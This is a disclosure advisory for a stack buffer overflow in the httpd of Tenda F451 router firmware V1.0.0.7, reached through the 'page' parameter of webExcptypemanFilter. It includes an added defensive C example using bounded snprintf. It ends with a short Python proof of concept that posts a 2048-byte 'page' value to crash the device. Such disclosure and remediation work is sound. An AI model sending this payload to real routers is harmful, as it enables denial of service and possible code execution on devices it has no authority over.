Information
Vendor: Tenda
Product: F451_kfw_V1.0.0.7_cn_svn7958
Version: V1.0.0.7
Vulnerability: buffer overflow
Firmware Download: https://www.tenda.com.cn/material/show/1597
Author: Xianmao Ji
Descriptions
We found an overflow vulnerability in httpd:
In the fromwebExcptypemanFilter function, it reads in a user-provided parameter, page.
The variable v6 is then passed to the sprintf function without any length check, which may overflow the stack-based buffer s.
As a result, by requesting the page, an attacker can easily cause a denial of service or achieve remote code execution.
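The bounded form of the formatting step described above, as an added example that is not taken from the advisory or from the Tenda firmware. The buffer size, the format string, the function names and the assumption that page is a short decimal number are hypothetical, since the page does not show the real ones.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size and format string: the advisory does not give the real ones. */
#define REDIRECT_BUF_SIZE 256
#define REDIRECT_FMT "example.asp?page=%s"

/* Pattern described in the advisory (kept as a comment, not compiled):
 *     char s[REDIRECT_BUF_SIZE];
 *     sprintf(s, REDIRECT_FMT, v6);   // v6 = user-provided "page"
 * sprintf has no destination size, so a long v6 is written past the end of s. */

/* Assumption: "page" is a page number, so accept only 1..8 decimal digits. */
static int page_is_valid(const char *page)
{
    size_t n;
    if (page == NULL) return 0;
    n = strlen(page);
    if (n == 0 || n > 8) return 0;
    return strspn(page, "0123456789") == n;
}

/* Bounded replacement: returns 0 on success, -1 if the input is rejected or
 * the formatted string would not fit in dst. dst is left empty on failure. */
int build_redirect(char *dst, size_t dstsz, const char *page)
{
    int need;
    if (dst == NULL || dstsz == 0) return -1;
    dst[0] = '\0';
    if (!page_is_valid(page)) return -1;
    need = snprintf(dst, dstsz, REDIRECT_FMT, page);
    if (need < 0 || (size_t)need >= dstsz) {   /* truncation is an error */
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char s[REDIRECT_BUF_SIZE];
    char big[2049];
    memset(big, 'a', 2048);                    /* same length as the PoC value */
    big[2048] = '\0';
    printf("page=3   -> %d (%s)\n", build_redirect(s, sizeof s, "3"), s);
    printf("2048 x a -> %d\n", build_redirect(s, sizeof s, big));
    return 0;
}
```

The snprintf return-value check matters on its own: without it a too-long value would be silently truncated rather than rejected.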
Proof of Concept (POC)
import requests

# Send an oversized "page" parameter to the affected handler
url = "http://127.0.0.1/goform/webExcptypemanFilter"
payload = {
    'page': b'a' * 2048
}
res = requests.post(url=url, data=payload)
Overcome
